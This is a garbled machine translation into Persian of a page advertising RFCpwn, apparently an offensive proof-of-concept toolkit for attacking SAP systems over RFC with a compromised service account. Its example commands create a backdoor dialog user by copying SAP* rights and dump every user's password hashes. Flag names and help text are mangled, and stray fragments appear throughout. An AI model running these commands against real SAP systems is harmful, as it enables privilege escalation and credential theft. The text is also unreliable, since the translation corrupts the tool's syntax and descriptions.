جعبه ابزار برای شمارش و بهره برداری SAP با استفاده از تماس های SAP RFC
این یک ابزار برای نشان دادن تأثیر حسابهای سرویس هک شده است.
این PoC برای استفاده در محیط های تولید در نظر گرفته نشده است.
RFCpwn از pirfc و كتابخانه هاي ارائه شده توسط SAP در اين آدرس استفاده مي كند: https://github.com/SAP/PyRFC#installation موفق19659005 022 استفاده: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
[-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
[-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]
شمارش سبک Impacket و ابزار بهره برداری با استفاده از تماس های SAP RFC
آرگومان های اختیاری:
-h ، – راهنما این پیام راهنما را نشان داده و از آن خارج شوید
خروجی DEBUG را روشن کنید
احراز هویت:
-ip IP
نام کاربری RFC کاربران نام کاربری RFC
-P رمز عبور رمز عبور کاربران RFC
-c مشتری مشتری- eg.000
– شماره سیستم Sysid- به عنوان مثال 00
فرمان پینگ RFC
سوء استفاده کاربر:
-enum برای شمارش یک کاربر خاص از آن استفاده کنید
تمرین اضافه کردن یک کاربر گفتگو
-UUSER USER برای مشخص کردن کاربر برای -usercopy و -userenum لازم است
کپی COPY کاربر برای کپی کردن موردنیاز برای انجام عمل جراحی
رمزعبور PW رمزعبور کاربر جدید برای تمرین
مجموعه هاش:
استفاده از زباله های کمپرسی Dump را با موارد زیر استفاده کنید
-ارزان EXPERIMENTAL – زباله های واژگون BodeE / PASS CodeE
نمونه
پینگ – اتصال را تأیید کنید
./ RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping
حقوق کاربر را در گفتگوی کاربر جدید کپی کنید. اگر – کپی مشخص نشده است ، از SAP * استفاده می شود.
./ RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass - usercopy -user مهاجم -pw changeme1
زباله واضح همه کاربران. – گزینه ای برای رمزهای آزمایشی کد رمزگذاری و رمز عبور.
./ RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump
Demo

بارگیری RFCpwn
¯ _ (ツ) _ / ¯
توجه: اطلاعات مربوط به تحقیق ، آموزش یا او دیتا استفاده خودخواهانه براساس قوانین فدراسیون روسیه قابل مجازات است.